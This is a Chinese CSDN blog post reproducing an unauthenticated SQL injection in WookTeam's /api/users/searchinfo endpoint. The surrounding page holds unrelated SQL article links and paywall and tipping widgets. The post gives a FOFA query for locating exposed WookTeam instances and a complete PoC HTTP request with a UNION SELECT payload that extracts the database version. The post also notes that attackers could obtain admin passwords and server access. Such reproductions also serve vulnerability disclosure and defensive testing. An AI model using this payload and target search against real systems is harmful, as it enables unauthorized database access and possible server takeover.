WookTeam searchinfo SQL注入漏洞复现

已于 2024-08-13 19:43:26 修改
阅读量113 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-13 19:43:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/141171898
版权

0x01 产品简介

WookTeam是一款轻量级的在线团队协作工具,提供各类文档工具、在线思维导图、在线流程图、项目管理、任务分发,知识库管理等工具。

0x02 漏洞概述

WookTeam /api/users/searchinfo 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 复现环境

FOFA:title="Wookteam"

0x04 漏洞复现

PoC

GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive

查询数据库版本

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)
m0_46699477的博客
07-11 895
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)。 截至2024年7月11日,Goby红队版已扩充以下历年HW已公开POC漏洞库,本次更新**84**个
sql日记
qq_43473129的博客
09-22 256
sql实战操作: explain查看sql执行计划 EXPLAIN SELECT sql_no_cache count(*) FROM user_info WHERE unit_id in(32012000,32012000,32009000,32006000,32001213); 查看表中的索引 show index from table_name; 给已有的表添加索引: ALTER TABLE `table_name` ADD INDEX index_name(column) ALTER TABLE
sqlserver查询补全时间_Sqlserver查询性能分析
weixin_32302013的博客
01-14 132
查询性能分析(执行结果分析)1、方法在查询窗口中输入以下命令dbccdropcleanbuffers--注释:清除数据dbccfreeproccache--注释:清除缓存这是为了每次查询时,不会因为重复查询对结果有干扰,接着在窗口中输入以下命令。Setstatisticsioon--注释:开启系统资源使用统计Setstatisticstimeon--注释:开启执行时间统计然后在窗口中...
SQLServer 实用语法大全
AricZhou
01-25 1608
1、将表名作为参数的存储过程 eg: create proc s_Table_SearchInfo  @TableName nvarchar(100)  AS   Begin declare @value nvarchar(50),                 @sql nvarchar(1000)  set @sql= ' select * from ' + @TableNa
Sqlserver查询性能分析
web_go_run的专栏
03-10 1214
Sqlserver查询性能分析(执行结果分析) 1、方法 在查询窗口中输入以下命令 dbcc dropcleanbuffers      --注释:清除数据 dbcc  freeproccache            --注释:清除缓存 这是为了每次查询时,不会因为重复查询对结果有干扰,接着在窗口中输入以下命令。            Set statistics io on     
MyBatis中写Sql 的select循环语句含多个参数的
qq_42530436的博客
04-12 1347
如果在dao层的函数中含有多个参数 public List<NewsInfo> findByPage(@Param("start")int start, @Param("rows")Integer rows, @Param("searchinfo")String[] searchinfo); 例此代码,而在xml中进行循环的字段只有searchinfo <select id="f...
C# sql like查询
weixin_53370274的博客
05-28 493
好久不写了 忘了 记下 string searchInfo = "abc"; string sqls = @"select * from table t where t.name like @search or t.note like @search order by t.id desc"; List<DbParameter> parames = new List<DbParameter>(); parames.Add(new MySqlParameter() {
C# EF Linq SqlFunctions.DatePart
09-07 103
if (!string.IsNullOrEmpty(searchInfo.AuthorisedDate)) list_A = list_A.Where(q => q.AUTHORISED_DATE.HasValue && SqlFunctions.DatePart("yyyy", q.AUTHORIS...
sql-or与and的配合使用
qq_45735918的博客
02-25 2666
关于对sql语句中的or与and,进行深入解剖 一:优先级 and > or 二:使用场景 1.批量修改 update *** a set a.is_del = 1 where a.is_del = 0 and a.edu_name = ? and a.project_name = ? or a.is_del = 0 and a.edu_name = ? and a.project_name = ? or a.is_del = 0 and a.edu_name = ? and a.project
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
weixin_34381687的博客
03-21 467
漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模...
SQLServer数据库实用语法
12-17
### SQL Server 数据库实用语法详解 #### 一、存储过程创建与使用 在 SQL Server 数据库管理系统中,存储过程是一种预编译的 SQL 代码集合,它可以被当作一个单独的对象来调用,从而提高应用程序的执行效率并简化...
C# 公共类文档包含Sql、Excel、Xml、GDI、窗体冻结解冻、图片水印压缩编码、正则表达式、反射操作等,各辅助类封装完美
12-03
查询信息实体类(SearchInfo.cs)7.类型(例如:int,string,double)转换(SmartDataReader.cs)8.Sql命令操作函数(可用于安装程序的时候数据库脚本执行)(SqlScriptHelper.cs)----------Device--------------1....
infosearch:在这个项目中,我将使用elasticsearch解析RSS新闻
05-15
在本项目"infosearch"中,开发者旨在利用Elasticsearch这一强大的搜索引擎来处理和解析RSS新闻数据。Elasticsearch是一个基于Lucene的分布式、RESTful风格的搜索和数据分析引擎,能够提供实时、可扩展的数据存储、...
利用python对mysql表做全局模糊搜索并分页实例
09-08
dataSql = f"select * from {tableName} {searchInfo} limit {limit1}, {limit2}" cursor.execute(dataSql) # 将查询结果转化为字典列表 data = [dict(zip(columns, row)) for row in cursor.fetchall()] ...
匹兔(p2 search)资源搜索神器
08-27
[软件介绍] 匹兔(p2 search),名字原于软件采用p2p 技术进行网络资源搜索,故起名 "匹兔".软件根据电驴ed2k协议,采用节点直接获取的技术,直接搜索p2p网络的资源。搜索范围比较广,默认支持搜索各种资源,如影视,图片...
高级网络渗透测试技术(第一篇)
艰难的活着
08-07 975
网络渗透测试(Penetration Testing, Pen Test)是通过模拟恶意攻击者的行为来评估计算机系统、网络或Web应用的安全性。高级网络渗透测试技术则涵盖了更复杂和深入的测试方法,能够更有效地发现并利用系统中的潜在漏洞。编写自定义Exploit:根据具体漏洞编写自定义漏洞利用代码。s.close()
DLMS/COSEM中的信息安全安全密钥(中)
最新发布
huaqianzkh的专栏
08-09 670
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1501
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
软件项目质量管理体系,软件评审,资质认证,安全建设及项目管理匹配资料(原件参考)
xx_123321456的博客
08-09 322
软件项目质量管理体系是指一套系统化的管理方法、流程、工具和文档,旨在确保软件项目从需求分析、设计、开发、测试到部署和维护的整个生命周期中,都能达到预定的质量标准和客户期望。该体系通过明确的角色和责任、标准化的工作流程、有效的质量控制和持续改进机制,确保软件项目的质量得到全面、有效的管理和提升。它涵盖了质量规划、质量保证和质量控制等多个方面,旨在提高软件产品的可靠性、稳定性、易用性和可维护性。用户手册技术评审报告,需求规格说明书评审报告,项目计划技术评审报告,系统设计技术评审报告。
使用 sql server创建视图SearchInfo查询借阅记录中的借阅编号、读者证件号、图书编号、书名、作者、出版社、借阅时间、应还时间、操作员, 保存为一个CreateView.sql文件;
05-12
你可以按照以下步骤创建视图SearchInfo: 1. 打开 SQL Server Management Studio,连接到你所需要的数据库。 2. 在查询窗口中输入以下 SQL 语句: ``` CREATE VIEW SearchInfo AS SELECT br.BorrowID, r.ReaderID, b.BookID, b.BookName, b.Author, b.Publisher, br.BorrowTime, br.DueTime, br.Operator FROM BorrowRecords br JOIN Books b ON br.BookID = b.BookID JOIN Readers r ON br.ReaderID = r.ReaderID; ``` 以上语句中,我们使用了 JOIN 操作符将 BorrowRecords、Books 和 Readers 三个表连接起来,从而获取借阅记录中的相关信息。 3. 将以上 SQL 语句保存为一个名为 CreateView.sql 的文件。 4. 在查询窗口中执行 CreateView.sql 文件,即可创建名为 SearchInfo 的视图。 你现在可以使用以下 SQL 语句查询 SearchInfo 视图中的数据: ``` SELECT * FROM SearchInfo; ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值